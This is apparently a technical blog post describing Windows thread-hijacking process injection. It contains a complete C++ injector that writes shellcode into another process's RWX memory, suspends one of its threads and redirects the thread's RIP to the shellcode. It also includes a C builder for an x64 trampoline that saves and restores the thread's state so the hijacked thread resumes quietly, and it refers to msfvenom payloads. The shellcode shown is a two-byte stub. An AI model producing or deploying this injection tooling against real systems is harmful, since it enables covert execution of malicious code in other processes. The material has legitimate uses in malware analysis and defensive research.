Thread Hijacking Injection Technique
Thread Hijacking Injection
Principle
Thread hijacking injects code into a remote process without creating a new thread in it. Instead of CreateRemoteThread, an existing thread of the target is suspended, its saved context is read, its instruction pointer is redirected to shellcode that was written into the target's address space, and the thread is resumed so that it executes the shellcode in place of whatever it was doing.
Implementation flow
- OpenProcess: open a handle (targetProcessHandle) to the process to inject into.
- VirtualAllocEx: allocate executable memory (remoteBuffer) inside the target process.
- WriteProcessMemory: write the shellcode into remoteBuffer.
- Find the ID of the thread to hijack in the target process: CreateToolhelp32Snapshot takes a thread snapshot, Thread32First/Thread32Next walk it, and the entry whose th32OwnerProcessID matches the target PID gives the thread ID.
- OpenThread: open a handle (threadHijacked) to that thread.
- SuspendThread: suspend the target thread.
- GetThreadContext: read the suspended thread's context.
- Point the thread's instruction pointer (the RIP register) at the shellcode (remoteBuffer).
- SetThreadContext: write the modified context back to the hijacked thread.
- ResumeThread: resume the hijacked thread; it now executes the shellcode.
Sample code
#include <iostream>
#include <cstdlib>
#include <Windows.h>
#include <TlHelp32.h>
int main(int argc, char* argv[])
{
    // x64 shellcode to run in the target. The post only shows the first two
    // bytes of its payload; substitute a complete one before use.
    unsigned char shellcode[] =
        "\xfc\x48";
    HANDLE targetProcessHandle = NULL;
    PVOID remoteBuffer = NULL;
    HANDLE threadHijacked = NULL;
    HANDLE snapshot = INVALID_HANDLE_VALUE;
    THREADENTRY32 threadEntry = { 0 };
    CONTEXT context = { 0 };
    // The target PID is taken from the command line (the post's "fill in the
    // PID here" string placeholder does not compile as a DWORD).
    if (argc < 2) { std::cerr << "usage: " << argv[0] << " <pid>" << std::endl; return 1; }
    DWORD targetPID = (DWORD)std::strtoul(argv[1], nullptr, 10);
    context.ContextFlags = CONTEXT_FULL;
    threadEntry.dwSize = sizeof(THREADENTRY32);
    // Open the target, allocate RWX memory in it and copy the shellcode over.
    targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    if (targetProcessHandle == NULL)
    {
        std::cerr << "OpenProcess failed: " << GetLastError() << std::endl;
        return 1;
    }
    remoteBuffer = VirtualAllocEx(targetProcessHandle, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    if (remoteBuffer == NULL || !WriteProcessMemory(targetProcessHandle, remoteBuffer, shellcode, sizeof shellcode, NULL))
    {
        std::cerr << "VirtualAllocEx/WriteProcessMemory failed: " << GetLastError() << std::endl;
        return 1;
    }
    // Enumerate all threads on the system and take the first one owned by the
    // target. Thread32First is part of the loop so the first entry is not skipped.
    snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snapshot != INVALID_HANDLE_VALUE && Thread32First(snapshot, &threadEntry))
    {
        do
        {
            if (threadEntry.th32OwnerProcessID == targetPID)
            {
                threadHijacked = OpenThread(THREAD_ALL_ACCESS, FALSE, threadEntry.th32ThreadID);
                break;
            }
        } while (Thread32Next(snapshot, &threadEntry));
        CloseHandle(snapshot);
    }
    if (threadHijacked == NULL) { std::cerr << "no thread found in PID " << targetPID << std::endl; return 1; }
    // Suspend the thread, point its RIP at the shellcode and let it run.
    SuspendThread(threadHijacked);
    if (GetThreadContext(threadHijacked, &context))
    {
        context.Rip = (DWORD_PTR)remoteBuffer;
        SetThreadContext(threadHijacked, &context);
    }
    ResumeThread(threadHijacked);
    CloseHandle(threadHijacked);
    CloseHandle(targetProcessHandle);
    return 0;
}
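The sample above overwrites RIP and never returns to the hijacked thread's original code, so the thread is lost once the shellcode finishes, and if the shellcode ends with a plain ret the thread crashes on garbage. The usual remedy is to prefix the shellcode with a small trampoline that saves every register and the flags, calls the shellcode as an ordinary function on an aligned stack, restores the state and jumps back to the original RIP. The following is an added example and not code from the original post: a C builder for such an x64 trampoline, written so the emitted bytes can be inspected and checked offline. The two addresses in main are constructed placeholders standing in for the Rip read by GetThreadContext and the remoteBuffer returned by VirtualAllocEx; the function name build_restore_trampoline is this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

static void put_u32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));   /* little endian */
}

static void put_u64(uint8_t *p, uint64_t v)
{
    for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Emit an x64 trampoline that saves the hijacked thread's state, calls
 * shellcode_addr as a normal function, restores the state and continues at
 * orig_rip. Intended remote layout: [trampoline][shellcode], with RIP set to
 * the trampoline. Returns bytes written, or 0 if cap is too small. */
size_t build_restore_trampoline(uint64_t orig_rip, uint64_t shellcode_addr,
                                uint8_t *out, size_t cap)
{
    static const uint8_t save[] = {
        0x9C,                                        /* pushfq                         */
        0x50, 0x51, 0x52, 0x53, 0x55, 0x56, 0x57,    /* push rax,rcx,rdx,rbx,rbp,rsi,rdi */
        0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53,
        0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, /* push r8..r15               */
        0x48, 0x89, 0xE5,                            /* mov rbp, rsp  (keep unaligned rsp) */
        0x48, 0x83, 0xE4, 0xF0,                      /* and rsp, -16  (ABI alignment)  */
        0x48, 0x83, 0xEC, 0x20,                      /* sub rsp, 0x20 (shadow space)   */
        0x48, 0xB8 };                                /* movabs rax, <shellcode_addr>   */
    static const uint8_t call_restore[] = {
        0xFF, 0xD0,                                  /* call rax                       */
        0x48, 0x89, 0xEC,                            /* mov rsp, rbp                   */
        0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C,
        0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58, /* pop r15..r8                */
        0x5F, 0x5E, 0x5D, 0x5B, 0x5A, 0x59, 0x58,    /* pop rdi,rsi,rbp,rbx,rdx,rcx,rax */
        0x9D,                                        /* popfq                          */
        0x68 };                                      /* push <low 32 bits of orig_rip> */
    /* All registers are already restored, so the final jump cannot use one:
     * push imm32 (sign-extended), patch the high dword on the stack, ret. */
    static const uint8_t fix_high[] = { 0xC7, 0x44, 0x24, 0x04 }; /* mov dword [rsp+4], imm32 */

    size_t n = sizeof save + 8 + sizeof call_restore + 4 + sizeof fix_high + 4 + 1;
    if (cap < n) return 0;
    uint8_t *p = out;
    memcpy(p, save, sizeof save);                 p += sizeof save;
    put_u64(p, shellcode_addr);                   p += 8;
    memcpy(p, call_restore, sizeof call_restore); p += sizeof call_restore;
    put_u32(p, (uint32_t)orig_rip);               p += 4;
    memcpy(p, fix_high, sizeof fix_high);         p += sizeof fix_high;
    put_u32(p, (uint32_t)(orig_rip >> 32));       p += 4;
    *p++ = 0xC3;                                  /* ret -> orig_rip */
    return (size_t)(p - out);
}

int main(void)
{
    uint8_t buf[128];
    /* Constructed placeholders: the Rip read by GetThreadContext and the
     * remoteBuffer returned by VirtualAllocEx. The shellcode is placed right
     * after the trampoline, so its address is remote + trampoline length. */
    uint64_t orig_rip = 0x00007FF612345678ULL;
    uint64_t remote   = 0x0000020000001000ULL;
    size_t n = build_restore_trampoline(0, 0, buf, sizeof buf);        /* length only */
    n = build_restore_trampoline(orig_rip, remote + n, buf, sizeof buf);
    for (size_t i = 0; i < n; i++)
        printf("%02X%s", buf[i], (i % 16 == 15 || i + 1 == n) ? "\n" : " ");
    return 0;
}
```

To use it in the injector, write the trampoline followed by the shellcode into remoteBuffer, pass the unmodified context.Rip as orig_rip and remoteBuffer plus the trampoline length as shellcode_addr, and then set context.Rip to remoteBuffer. The shellcode must return to its caller with ret rather than terminating the thread (a payload whose exit routine calls ExitThread, such as an msfvenom payload built with EXITFUNC=thread, would end the hijacked thread instead of handing it back). The stack is realigned before the call because a thread suspended mid-execution can have any RSP alignment, and Windows x64 has no red zone, so pushing below the interrupted RSP is safe.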
Document information
- Author: Nattevak
- Link: https://HLuKT.github.io/2023/05/05/Thread-Hijacking-Inject/
- License: free to repost, non-commercial, no derivatives, attribution required (Creative Commons 3.0 license)